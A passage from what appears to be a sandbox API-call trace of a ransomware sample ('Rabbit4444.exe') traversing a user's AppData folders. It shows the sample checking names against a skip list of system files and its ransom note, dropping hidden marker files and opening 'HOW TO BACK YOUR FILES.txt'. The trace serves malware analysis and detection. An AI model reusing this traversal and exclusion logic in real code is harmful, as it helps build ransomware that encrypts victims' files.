lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3957349d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeece1ee8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0062.894] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.894] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.894] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.894] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.894] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3957349d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeece1ee8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.894] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.894] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.894] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.894] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.894] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.894] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeece1ee8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeece1ee8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeed08190, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.894] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.894] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.894] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfdd9a6b0, ftLastAccessTime.dwHighDateTime=0x1d39f5c, ftLastWriteTime.dwLowDateTime=0xfdd9a6b0, ftLastWriteTime.dwHighDateTime=0x1d39f5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0062.894] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.894] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.895] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0062.895] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0062.895] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0062.895] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0062.895] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0062.895] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0062.895] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0062.895] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0062.895] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0062.895] lstrcpyW (in: lpString1=0x130ebd6, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0062.895] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0062.895] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0062.895] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x11e2c0 [0062.895] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x1220e8 [0062.895] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42147ef, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1d440c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x88ced4a1, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0062.895] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0062.895] lstrcpyW (in: lpString1=0x130ebd6, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0062.895] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0062.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0062.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x11e380 [0062.896] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122148 [0062.896] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1d44c20, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x41ee58e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0062.896] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0062.896] lstrcpyW (in: lpString1=0x130ebd6, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0062.896] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0062.897] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0062.897] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x123760 [0062.897] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x1222c8 [0062.897] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xd1da511e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8addc228, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2="Rabbit4444.exe") returned -1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0062.897] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0062.897] lstrcpyW (in: lpString1=0x130ebd6, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0062.897] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft", dwFileAttributes=0x2010) returned 1 [0062.898] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0062.898] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123820 [0062.898] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x1222e8 [0062.898] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f20fd1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x41ee58e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0062.898] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0062.898] lstrcpyW (in: lpString1=0x130ebd6, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0062.898] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0062.898] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118658 [0062.898] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x122068 [0062.898] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f20fd1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x41ee58e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0062.898] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0062.898] lstrcpyW (in: lpString1=0x130ebd6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.898] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.899] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0062.899] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.899] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.899] CloseHandle (hObject=0x2a0) returned 1 [0062.899] CloseHandle (hObject=0x298) returned 1 [0062.900] GetCurrentThreadId () returned 0xd98 [0062.900] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0062.900] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp" [0062.900] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118658 | out: hHeap=0xe0000) returned 1 [0062.900] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0062.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp" [0062.900] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\" [0062.900] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0062.900] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.902] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.904] FlushFileBuffers (hFile=0x298) returned 1 [0062.905] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.905] CloseHandle (hObject=0x298) returned 1 [0062.906] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp") returned 83 [0062.906] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.906] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f20fd1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeed08190, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0062.906] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.906] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.906] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.906] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.906] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f20fd1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeed08190, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.906] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.906] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.906] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.906] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.906] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.906] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeed08190, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeed08190, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeed08190, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.906] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.906] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.906] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeed08190, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeed08190, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeed08190, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.906] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0062.906] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.906] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.907] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0062.907] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.907] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.907] CloseHandle (hObject=0x2a0) returned 1 [0062.907] CloseHandle (hObject=0x298) returned 1 [0062.907] GetCurrentThreadId () returned 0xd98 [0062.907] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0062.907] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft" [0062.908] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.908] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0062.908] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft" [0062.908] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\" [0062.908] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3" [0062.908] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.909] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.911] FlushFileBuffers (hFile=0x298) returned 1 [0062.925] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.925] CloseHandle (hObject=0x298) returned 1 [0062.925] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft") returned 88 [0062.925] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.925] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xd1da511e, 